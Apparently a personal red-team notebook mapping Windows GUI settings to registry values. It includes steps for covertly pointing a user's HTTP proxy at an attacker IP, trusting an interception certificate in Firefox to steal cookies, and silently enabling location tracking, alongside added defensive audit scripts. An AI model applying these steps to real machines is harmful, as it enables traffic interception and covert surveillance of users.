## Network and Internet

### Mobile Hotspot

See [[Windows - Mobile Hotspot#Covertly Enable Hotspot]].

### Sharing Wi-Fi Over Ethernet

[[2022-10-22_Sat]] - Open the network connections (ncpa.cpl) > go to properties of the Wi-Fi interface > Sharing tab > Check the "Allow other network users to connect through this computer's internet connection" then select "Ethernet" from the dropdown menu.

I did this while running [[SysInternals - Process Monitor|ProcMon]] in the background and filtered for registry writes (`RegSetValue`), and after excluding a bunch of other processes and paths, got these operations:

```text
9448 RegSetValue DllHost.exe HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SharedAccess\PublicIndex Type: REG_DWORD, Length: 4, Data: 25 SUCCESS
2312 RegSetValue svchost.exe HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{433ac09c-e8b2-484b-8633-2d12913502d0}\DisableDhcpOnConnect Type: REG_DWORD, Length: 4, Data: 1 SUCCESS
9448 RegSetValue DllHost.exe HKLM\System\CurrentControlSet\Control\Nsi\{eb004a00-9b1a-11d4-9123-0050047759bc}\10\0000000580000600c0a8890100000000 Type: REG_BINARY, Length: 56, Data: FF FF FF FF FF FF FF FF 10 00 00 00 10 00 00 00 SUCCESS
9448 RegSetValue DllHost.exe HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{433ac09c-e8b2-484b-8633-2d12913502d0}\IPAddress Type: REG_MULTI_SZ, Length: 30, Data: 192.168.137.1 SUCCESS
9448 RegSetValue DllHost.exe HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{433ac09c-e8b2-484b-8633-2d12913502d0}\SubnetMask Type: REG_MULTI_SZ, Length: 30, Data: 255.255.255.0 SUCCESS
9448 RegSetValue DllHost.exe HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SharedAccess\PrivateIndex Type: REG_DWORD, Length: 4, Data: 8 SUCCESS
9448 RegSetValue DllHost.exe HKLM\System\CurrentControlSet\Control\Network\SharedAccessConnection\EnableControl Type: REG_DWORD, Length: 4, Data: 0 SUCCESS
```

It should be noted that this string `433ac09c-e8b2-484b-8633-2d12913502d0` is the Ethernet interface's GUID:

```powershell
Get-WMIObject Win32_networkadapter | select Name, GUID

Name                                       GUID
----                                       ----
...
Intel(R) Ethernet Connection (13) I219-V   {433AC09C-E8B2-484B-8633-2D12913502D0}
...
```

Disabling the internet sharing resulted in these operations:

```text
21276 RegSetValue DllHost.exe HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SharedAccess\PublicIndex Type: REG_DWORD, Length: 4, Data: 25 SUCCESS
21276 RegSetValue DllHost.exe HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SharedAccess\PublicIndex Type: REG_DWORD, Length: 4, Data: 4294967295 SUCCESS
21276 RegSetValue DllHost.exe HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SharedAccess\PrivateIndex Type: REG_DWORD, Length: 4, Data: 4294967295 SUCCESS
2312 RegSetValue svchost.exe HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{98655ebc-af7e-487a-abec-92557ee3f4db}\EnableDhcp Type: REG_DWORD, Length: 4, Data: 1 SUCCESS
```

I stopped at this point.

Another way to bridge connections between the Wi-Fi and Ethernet adapters is by creating a Bridge interface as explained in [this article](https://www.how2shout.com/how-to/bridge-wifi-to-ethernet-adapter-to-share-internet.html). Haven't looked into it yet.

### HTTP Proxy Server

[[2022-07-07_Thu]] - It's possible to set the HTTP proxy with PowerShell, and it requires only user privileges (evil laugh) because the proxy is per-user.
This is what the "Proxy Settings" GUI is doing in the background:

```powershell
$proxyRegKey = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings'

# Enable proxy
Set-ItemProperty -Path $proxyRegKey -name ProxyServer -Value "192.168.30.123:8080" # attacker's IP
Set-ItemProperty -Path $proxyRegKey -name ProxyEnable -Value 1

# Disable proxy
Set-ItemProperty -Path $proxyRegKey -name ProxyServer -Value ""
Set-ItemProperty -Path $proxyRegKey -name ProxyEnable -Value 0
```

Then test the proxy:

```powershell
iwr -UseBasicParsing goodreads.com | select StatusCode
iwr : The underlying connection was closed: Could not establish trust relationship for the SSL/TLS secure channel.
```

We get this error because the proxy certificate isn't installed. Do so using this technique - [[How Does TLS Work#Windows#Covertly Installing Root Certificate]] (requires admin). Test it again and it should work:

```powershell
iwr -UseBasicParsing https://ifconfig.me | select StatusCode

StatusCode
----------
       200
```

> It just occurred to me that all of this can be used to steal browser cookies and to [[Pass the Cookie#5 Proxying HTTP S Traffic]].

If any browser processes are open you may need to restart them in order to have them load the computer's root certificates into memory.

#### Firefox

Initially Firefox still showed the privacy message, but after trying a couple minutes later it went away.

[[2022-10-27_Thu]] - I tried again and Firefox wouldn't accept the certificate. After some Googling I came across [this thread](https://support.umbrella.com/hc/en-us/articles/115000669728-Configuring-Firefox-to-use-the-Windows-Certificate-Store) explaining that Firefox by default doesn't accept Root authorities in the user's Windows certificate store, however it's possible to manually modify this by going to `about:config` > *Accept warning* > `security.enterprise_roots.enabled` > Set to *true*.
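Seen from the defending side, the per-user proxy values and the Firefox preference named above can both be read without elevation, so they can be checked on a host. The following read-only audit is an added example, not part of the original notes; the function name `Get-InterceptionIndicators` is hypothetical, and it assumes Firefox profiles sit under the default `%APPDATA%\Mozilla\Firefox\Profiles` path and store the preference as a `user_pref(...)` line in a `.js` file.

```powershell
# Added example (not from the original notes): read-only check of the current user's
# proxy values and Firefox's enterprise-roots preference. Function name is hypothetical.
function Get-InterceptionIndicators {
    $inet = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings'
    $p = Get-ItemProperty -Path $inet -ErrorAction SilentlyContinue

    # Same values the "Proxy Settings" GUI writes; no elevation is needed to read them.
    if ($p -and $p.ProxyEnable -eq 1) {
        [pscustomobject]@{
            Check  = 'Per-user proxy enabled'
            Detail = "ProxyServer=$($p.ProxyServer)"
        }
    }
    # A PAC URL is a second way this user's traffic can be redirected.
    if ($p -and $p.AutoConfigURL) {
        [pscustomobject]@{
            Check  = 'Per-user proxy auto-config'
            Detail = "AutoConfigURL=$($p.AutoConfigURL)"
        }
    }

    # Assumption: default profile location; preference stored as a user_pref(...) line.
    $profiles = Join-Path $env:APPDATA 'Mozilla\Firefox\Profiles'
    $pattern  = 'user_pref\("security\.enterprise_roots\.enabled",\s*true\)'
    if (Test-Path $profiles) {
        Get-ChildItem -Path (Join-Path $profiles '*\*.js') -File -ErrorAction SilentlyContinue |
            Select-String -Pattern $pattern |
            ForEach-Object {
                [pscustomobject]@{
                    Check  = 'Firefox trusts Windows root store'
                    Detail = '{0} (line {1})' -f $_.Path, $_.LineNumber
                }
            }
    }
}

# Empty output means none of the three indicators is present for this user.
Get-InterceptionIndicators | Format-Table -AutoSize -Wrap
```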
Going through the above with Procmon running in the background showed that enabling this setting modified this file:

```text
C:\Users\Maor\AppData\Roaming\Mozilla\Firefox\Profiles\0ymylxck.default-release\prefs-1.js
```

And diffing the file before and after the modification showed that setting it to true inserts the following on line 227:

```text
user_pref("security.enterprise_roots.enabled", true);
```

I played around with this and at the end the only one that worked was adding the above to line 227 and restarting Firefox.

#### Chrome

Process restart required.

#### Edge

Process restart required.

My takeaway is that if I was to go through this process on a target, I'd want to first check what browsers they're using, then what version of the browser, I'd then set up a replica on my end, do testing similar to the above and only then commence with modifications on the target.

## Privacy

Under *Settings* > *Privacy* > *App permissions*, enabling any of these features seems to follow the same pattern, which is to change the `Deny` to `Allow` in the `Value` key under:

```text
hklm:\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\
```

Here are all the relevant keys:

```text
ls "hklm:\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\"

Name                       Property
----                       --------
activity                   Value : Allow
appDiagnostics             Value : Allow
appointments               Value : Allow
bluetooth                  Value : Allow
bluetoothSync              Value : Allow
broadFileSystemAccess      Value : Allow
cellularData               Value : Allow
chat                       Value : Allow
contacts                   Value : Allow
documentsLibrary           Value : Allow
email                      Value : Allow
gazeInput                  Value : Allow
humanInterfaceDevice       Value : Allow
location                   Value : Deny
microphone                 Value : Allow
phoneCall                  Value : Allow
phoneCallHistory           Value : Allow
picturesLibrary            Value : Allow
radios                     Value : Allow
sensors.custom             Value : Allow
serialCommunication        Value : Allow
usb                        Value : Allow
userAccountInformation     Value : Allow
userDataTasks              Value : Allow
userNotificationListener   Value : Allow
videosLibrary              Value : Allow
webcam                     Value : Deny
wifiData                   Value : Allow
wiFiDirect                 Value : Allow
```

Because the hive is HKLM, modifying any of the above keys will require admin rights.

### Location

[[2022-07-08_Fri]]

#### Allow access to location on this device

![[Pasted image 20220708152008.png]]

Running Process Monitor in the background while toggling the "Allow access to location on this device" on and off shows the four actions:

![[Pasted image 20220708143033.png]]

When it's off:

```powershell
Get-Item "hklm:\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location"

Name       Property
----       --------
location   Value : Deny

Get-Item "hklm:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Sensor\Overrides\{BFA794E4-F964-4FDB-90F6-51056BFE4B44}"

Name                                     Property
----                                     --------
{BFA794E4-F964-4FDB-90F6-51056BFE4B44}   SensorPermissionState : 0
```

When it's on:

```powershell
Get-Item "hklm:\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location"

Name       Property
----       --------
location   Value : Allow

Get-Item "hklm:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Sensor\Overrides\{BFA794E4-F964-4FDB-90F6-51056BFE4B44}"

Name                                     Property
----                                     --------
{BFA794E4-F964-4FDB-90F6-51056BFE4B44}   SensorPermissionState : 1
```

So to covertly turn it on (requires admin):

```powershell
> .\geo1.ps1
Access Denied for Location Information
> Set-ItemProperty -Path "hklm:\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location" -Name "Value" -Value "Allow"
> .\geo1.ps1
https://maps.google.com/maps?q=32.07845164622014,34.77800536555182
```

Note that it works regardless of changing the second registry key.
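Because the Settings toggle changed both registry values together while a direct edit of the ConsentStore value alone was enough to grant access, a mismatch between the two is a useful audit signal. The following read-only check is an added example, not part of the original notes; the function names are hypothetical, treating a mismatch as a sign of a direct registry write is an inference from the observations above, and the listing also covers the per-user (HKCU) and per-app subkeys described in the subsections that follow.

```powershell
# Added example (not from the original notes): read-only view of ConsentStore state.
# Function names are hypothetical.
function Get-ConsentStoreState {
    param([string[]]$Capability = @('location', 'webcam', 'microphone'))
    $rel = 'SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore'
    foreach ($hive in 'HKLM:', 'HKCU:') {
        foreach ($cap in $Capability) {
            $root = '{0}\{1}\{2}' -f $hive, $rel, $cap
            if (-not (Test-Path -LiteralPath $root)) { continue }
            # The capability key itself, then per-app subkeys (package names, NonPackaged).
            $keys = @(Get-Item -LiteralPath $root) +
                    @(Get-ChildItem -LiteralPath $root -ErrorAction SilentlyContinue)
            foreach ($k in $keys) {
                $value = $k.GetValue('Value')
                if ($null -eq $value) { continue }
                $scope = if ($k.PSChildName -eq $cap) { '(capability)' } else { $k.PSChildName }
                [pscustomobject]@{ Hive = $hive; Capability = $cap; Scope = $scope; Value = $value }
            }
        }
    }
}

function Test-LocationToggleConsistency {
    # Both values changed together when the Settings toggle was used, so a mismatch
    # suggests the ConsentStore value was written directly (an inference, see lead-in).
    $consent  = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location'
    $override = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Sensor\Overrides\{BFA794E4-F964-4FDB-90F6-51056BFE4B44}'
    $v = (Get-ItemProperty -LiteralPath $consent  -ErrorAction SilentlyContinue).Value
    $s = (Get-ItemProperty -LiteralPath $override -ErrorAction SilentlyContinue).SensorPermissionState
    [pscustomobject]@{
        ConsentValue          = $v
        SensorPermissionState = $s
        Consistent            = (($v -eq 'Allow') -eq ($s -eq 1))
    }
}

Get-ConsentStoreState | Where-Object Value -eq 'Allow' | Format-Table -AutoSize
Test-LocationToggleConsistency | Format-List
```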
#### Allow apps to access your location

![[Pasted image 20220708151930.png]]

```powershell
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location" -Name "Value" -Value "Allow"
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location" -Name "Value" -Value "Deny"
```

#### Choose which apps can access your precise location

![[Pasted image 20220708153134.png]]

```powershell
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location\Microsoft.WindowsMaps_8wekyb3d8bbwe" -Name "Value" -Value "Allow"
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location\Microsoft.WindowsMaps_8wekyb3d8bbwe" -Name "Value" -Value "Deny"
```

#### Allow desktop apps to access your location

![[Pasted image 20220708151857.png]]

```powershell
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location\NonPackaged" -Name "Value" -Value "Allow"
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location\NonPackaged" -Name "Value" -Value "Deny"
```

### Camera

[[2022-07-09_Sat]] -

```powershell
Set-ItemProperty -Path "hklm:\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\webcam" -Name "Value" -Value "Allow"
```

Not working for some reason. Probably missing a registry key...

## System

### Power & Sleep

The time is represented in the registry in seconds, so 1 hour is `3600` and Never is `0`.
Changing the following registry keys requires SYSTEM privileges:

```powershell
Get-Acl -Path "HKLM:\System\CurrentControlSet\Control\Power\User\PowerSchemes\381b4222-f694-41f0-9685-ff5bb260df2e\7516b95f-f776-4464-8c53-06167f40cc99\3c0bc021-c8a8-4e07-a973-6b14cbcb2b7e" | select Owner

Owner
-----
NT AUTHORITY\SYSTEM
```

However, up until `\User\` the owner is `BUILTIN\Administrators`:

```powershell
Get-Acl -Path "HKLM:\System\CurrentControlSet\Control\Power\User\" | select Owner

Owner
-----
BUILTIN\Administrators
```

So as the owner we could change the permissions on the subsequent registry subkeys. See [here](https://sudhakaryblog.wordpress.com/2019/09/16/requested-registry-access-is-not-allowed/) and [here](https://www.ntfs.com/ntfs-permissions-acl-use.htm).

#### Screen

On battery power, turn off after:

```powershell
Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Power\User\PowerSchemes\381b4222-f694-41f0-9685-ff5bb260df2e\7516b95f-f776-4464-8c53-06167f40cc99\3c0bc021-c8a8-4e07-a973-6b14cbcb2b7e" -Name "DCSettingIndex" -Value "0"
```

When plugged in, turn off after:

```powershell
Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Power\User\PowerSchemes\381b4222-f694-41f0-9685-ff5bb260df2e\7516b95f-f776-4464-8c53-06167f40cc99\3c0bc021-c8a8-4e07-a973-6b14cbcb2b7e" -Name "ACSettingIndex" -Value "0"
```

#### Sleep

On battery power, PC goes to sleep after:

```powershell
Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Power\User\PowerSchemes\381b4222-f694-41f0-9685-ff5bb260df2e\238c9fa8-0aad-41ed-83f4-97be242c8f20\29f6c1db-86da-48c5-9fdb-f2b67b1f44da\" -Name "DCSettingIndex" -Value "0"
```

When plugged in, PC goes to sleep after:

```powershell
Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Power\User\PowerSchemes\381b4222-f694-41f0-9685-ff5bb260df2e\238c9fa8-0aad-41ed-83f4-97be242c8f20\29f6c1db-86da-48c5-9fdb-f2b67b1f44da\" -Name "ACSettingIndex" -Value "0"
```

***

## Footnotes

Resources